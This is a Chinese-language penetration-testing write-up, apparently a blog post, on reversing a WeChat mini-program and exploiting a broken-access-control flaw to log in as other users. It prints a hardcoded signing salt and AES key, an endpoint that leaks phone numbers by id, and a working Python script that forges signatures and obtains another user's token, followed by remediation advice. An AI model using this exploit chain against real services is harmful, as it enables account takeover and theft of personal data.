小程序渗透测试实战：逆向分析与越权登录漏洞挖掘<\/h1>

前言<\/h2>
本文记录了一个针对某小程序的完整渗透测试过程，涉及小程序逆向、加密算法分析、接口安全测试和越权登录漏洞挖掘。通过详细的技术分析，展示了如何突破小程序的安全防护机制，最终实现越权登录其他用户账户。<\/p>

0x00 环境准备<\/h2>

抓包环境搭建<\/strong><\/p>

使用Burp Suite或Fiddler等代理工具拦截小程序网络请求<\/li>
配置手机或模拟器的代理设置<\/li> <\/ul> <\/li>

小程序逆向<\/strong><\/p>

使用工具获取小程序包(wxapkg)<\/li>
反编译小程序代码<\/li>
分析关键业务逻辑和加密函数<\/li> <\/ul> <\/li> <\/ol>
0x01 登录流程分析<\/h2>
1. 登录请求加密分析<\/h3>
拦截登录请求包发现数据被加密，关键加密流程如下：<\/p>

加密函数定位<\/strong>：通过逆向找到Encrypt<\/code>函数<\/p> <\/li>
密钥获取方式<\/strong>：<\/p> key<\/span> =<\/span> wx<\/span>.getStorageSync<\/span>("key"<\/span>); \/\/ 从本地存储获取密钥 <\/span><\/span><\/span><\/span>key<\/span> =<\/span> g<\/span>(e<\/span>); \/\/ 通过g函数处理获得最终密钥 <\/span><\/span><\/span><\/code><\/pre><\/li> 密钥来源<\/strong>：<\/p> 从特定接口的返回包中获取nonFixedSax<\/code>和fixedSax<\/code>参数<\/li> 这些参数用于生成最终加密密钥<\/li> <\/ul> <\/li> <\/ol> 2. 签名机制分析<\/h3> 请求中存在签名验证机制(sign<\/code>)，构造流程：<\/p> 添加两个额外参数：<\/p> saltValue<\/code>: 固定值"c3Kx$0i67sds#"<\/li> timestamp<\/code>: 当前时间戳<\/li> <\/ul> <\/li> 参数排序：<\/p> 对所有参数按键名首字母进行大小写敏感排序<\/li> <\/ul> <\/li> 签名生成：<\/p> 将排序后的JSON字符串进行AES加密<\/li> 加密结果转换为16进制<\/li> 对16进制结果进行MD5哈希并转为大写<\/li> <\/ul> <\/li> <\/ol> 3. 关键JavaScript函数<\/h3> function<\/span> AES_Encrypt<\/span>(word<\/span>) { <\/span><\/span> var<\/span> srcs<\/span> =<\/span> CryptoJS<\/span>.enc<\/span>.Utf8<\/span>.parse<\/span>(word<\/span>); <\/span><\/span> var<\/span> aaa<\/span>=<\/span>CryptoJS<\/span>.enc<\/span>.Hex<\/span>.stringify<\/span>(srcs<\/span>); <\/span><\/span> return<\/span> aaa<\/span>.toString<\/span>(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>function<\/span> yierjiami<\/span>(ra<\/span>) { <\/span><\/span> const<\/span> jsonStr<\/span> =<\/span> ra<\/span>; <\/span><\/span> const<\/span> jsonObj<\/span> =<\/span> JSON<\/span>.parse<\/span>(jsonStr<\/span>); <\/span><\/span> jsonObj<\/span>.saltValue<\/span> =<\/span> "c3Kx$0i67sds#"<\/span>; <\/span><\/span> jsonObj<\/span>.timestamp<\/span> =<\/span> Date.now<\/span>().toString<\/span>(); <\/span><\/span> <\/span><\/span> const<\/span> sortedJsonObj<\/span> =<\/span> sortObjectKeys<\/span>(jsonObj<\/span>); <\/span><\/span> const<\/span> sortedJsonStr<\/span> =<\/span> JSON<\/span>.stringify<\/span>(sortedJsonObj<\/span>); <\/span><\/span> <\/span><\/span> console<\/span>.log<\/span>(sortedJsonStr<\/span>); <\/span><\/span> var<\/span> aaa<\/span>=<\/span>AES_Encrypt<\/span>(sortedJsonStr<\/span>); <\/span><\/span> return<\/span> [r<\/span>(aaa<\/span>).toUpperCase<\/span>(),jsonObj<\/span>.timestamp<\/span>]; <\/span><\/span>} <\/span><\/span><\/code><\/pre>0x02 漏洞挖掘过程<\/h2> 1. 越权登录测试<\/h3> 初步尝试<\/strong>：<\/p> 修改用户ID尝试登录其他账户<\/li> 发现返回"请求过期"错误，表明签名验证有效<\/li> <\/ul> <\/li> 签名绕过<\/strong>：<\/p> 分析签名生成算法<\/li> 使用Python的execjs调用JavaScript函数生成有效签名<\/li> 确保timestamp与签名匹配<\/li> <\/ul> <\/li> <\/ol> 2. 用户信息泄露接口发现<\/h3> 接口枚举<\/strong>：<\/p> 通过逆向分析找到可能的用户信息查询接口<\/li> 构造参数列表(userid、id等)进行爆破测试<\/li> <\/ul> <\/li> 敏感接口发现<\/strong>：<\/p> 找到可通过id查询手机号的接口： https:\/\/xxx.xxx.com.cn\/Pacificlife\/myConsumer\/detail <\/code><\/pre> <\/li> 请求示例： { <\/span><\/span> "id"<\/span>: "111"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 3. 完整攻击链构建<\/h3> 攻击步骤<\/strong>：<\/p> 通过userid和签名获取手机号<\/li> 对手机号进行AES加密<\/li> 使用加密后的手机号和userid获取有效token<\/li> 使用该token替换原有token实现越权登录<\/li> <\/ul> <\/li> Python实现<\/strong>：<\/p> <\/li> <\/ol> import<\/span> execjs <\/span><\/span>import<\/span> requests <\/span><\/span>import<\/span> json <\/span><\/span>import<\/span> binascii <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad <\/span><\/span> <\/span><\/span># JavaScript加密函数<\/span> <\/span><\/span>md5_js =<\/span> """ <\/span><\/span><\/span>\/\/ 此处包含完整的JavaScript加密函数 <\/span><\/span><\/span>"""<\/span> <\/span><\/span> <\/span><\/span>def<\/span> aes_ecb_encrypt_hex<\/span>(plaintext, key): <\/span><\/span> cipher =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_ECB) <\/span><\/span> padded_plaintext =<\/span> pad(plaintext.<\/span>encode(), AES.<\/span>block_size) <\/span><\/span> ciphertext =<\/span> cipher.<\/span>encrypt(padded_plaintext) <\/span><\/span> return<\/span> binascii.<\/span>hexlify(ciphertext).<\/span>decode() <\/span><\/span> <\/span><\/span># 第一步：通过ID获取手机号<\/span> <\/span><\/span>id =<\/span> 111<\/span> <\/span><\/span>content =<\/span> '{"id":"<\/span>%s<\/span>"}'<\/span> %<\/span> id <\/span><\/span>ctx =<\/span> execjs.<\/span>compile(md5_js) <\/span><\/span>sign, time =<\/span> ctx.<\/span>call('yierjiami'<\/span>, content) <\/span><\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "syscode"<\/span>: "TXQMP"<\/span>, <\/span><\/span> "charset"<\/span>: "utf-8"<\/span>, <\/span><\/span> "identify"<\/span>: "e4750356-9f8e-4a63-bdc3-80aca36699b6"<\/span>, <\/span><\/span> "sign"<\/span>: sign, <\/span><\/span> "User-Agent"<\/span>: "Mozilla\/5.0..."<\/span>, <\/span><\/span> "content-type"<\/span>: "application\/json"<\/span>, <\/span><\/span> "token"<\/span>: "eyJhbGciOiJIUzUxMiJ9..."<\/span>, <\/span><\/span> "Accept-Encoding"<\/span>: "gzip, deflate"<\/span>, <\/span><\/span> "timestamp"<\/span>: time <\/span><\/span>} <\/span><\/span> <\/span><\/span>response =<\/span> requests.<\/span>get("https:\/\/xxx.xxx.com.cn\/Pacificlife\/myConsumer\/detail"<\/span>, <\/span><\/span> json.<\/span>loads(content), headers=<\/span>headers, verify=<\/span>False<\/span>) <\/span><\/span>phone =<\/span> json.<\/span>loads(response.<\/span>text)['data'<\/span>]['secPhone'<\/span>] <\/span><\/span> <\/span><\/span># 第二步：加密手机号<\/span> <\/span><\/span>key_hex =<\/span> b<\/span>'3631475463441074'<\/span> <\/span><\/span>ciphertext =<\/span> aes_ecb_encrypt_hex(phone, key_hex) <\/span><\/span> <\/span><\/span># 第三步：获取登录token<\/span> <\/span><\/span>content =<\/span> '{"id":"<\/span>%s<\/span>","phone":"<\/span>%s<\/span>","name":"","salesCode":"","password":"","type":"1"}'<\/span> %<\/span> (id, ciphertext) <\/span><\/span>sign, time =<\/span> ctx.<\/span>call('yierjiami'<\/span>, content) <\/span><\/span> <\/span><\/span>headers['sign'<\/span>] =<\/span> sign <\/span><\/span>headers['timestamp'<\/span>] =<\/span> time <\/span><\/span> <\/span><\/span>response =<\/span> requests.<\/span>post("https:\/\/xxx.xxx.com.cn\/Pacificlife\/consumer\/login"<\/span>, <\/span><\/span> data=<\/span>json.<\/span>dumps(json.<\/span>loads(content)), <\/span><\/span> headers=<\/span>headers, verify=<\/span>False<\/span>) <\/span><\/span>token =<\/span> json.<\/span>loads(response.<\/span>text)['data'<\/span>]['token'<\/span>] <\/span><\/span><\/code><\/pre>0x03 漏洞修复建议<\/h2> 接口权限控制<\/strong>：<\/p> 严格限制用户信息查询接口的访问权限<\/li> 确保用户只能查询自己的信息<\/li> <\/ul> <\/li> 加密改进<\/strong>：<\/p> 使用更安全的密钥管理方案，避免密钥硬编码或可预测<\/li> 考虑使用非对称加密或更复杂的密钥派生函数<\/li> <\/ul> <\/li> 签名机制增强<\/strong>：<\/p> 引入随机数防止重放攻击<\/li> 增加请求有效性验证，如IP限制、请求频率限制等<\/li> <\/ul> <\/li> 敏感信息保护<\/strong>：<\/p> 避免在接口中直接返回用户敏感信息<\/li> 对必要返回的敏感信息进行脱敏处理<\/li> <\/ul> <\/li> 登录流程安全<\/strong>：<\/p> 增加多因素认证<\/li> 实现完善的会话管理机制<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本案例展示了小程序安全测试的完整流程，从逆向分析到漏洞利用。关键点在于：<\/p> 深入分析加密算法和签名机制<\/li> 通过接口枚举发现信息泄露漏洞<\/li> 构建完整的攻击链实现越权登录<\/li> 自动化脚本编写提高测试效率<\/li> <\/ol> 这种类型的漏洞危害性高，开发人员应重视接口权限控制和加密算法的安全性。<\/p>